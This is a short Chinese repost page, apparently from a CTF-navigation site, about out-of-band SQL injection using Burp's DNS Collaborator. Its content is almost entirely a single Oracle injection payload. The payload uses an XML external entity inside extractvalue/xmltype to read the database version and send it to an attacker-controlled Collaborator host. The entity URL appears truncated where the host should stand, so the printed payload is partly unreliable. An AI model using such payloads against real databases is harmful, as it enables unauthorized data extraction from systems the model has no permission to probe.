通过Burp使用DNS协作器进行的带外SQL攻击


通过Burp使用DNS协作器进行的带外SQL攻击

Version Payload :

(select extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % vapot SYSTEM "'||(select version from v$instance)||'Burp/">%vapot;]>'),'/l') from dual)

原文始发于微信公众号(Khan安全攻防实验室):通过Burp使用DNS协作器进行的带外SQL攻击

版权声明:admin 发表于 2022年12月22日 上午11:00。
转载请注明:通过Burp使用DNS协作器进行的带外SQL攻击 | CTF导航

相关文章

暂无评论

暂无评论...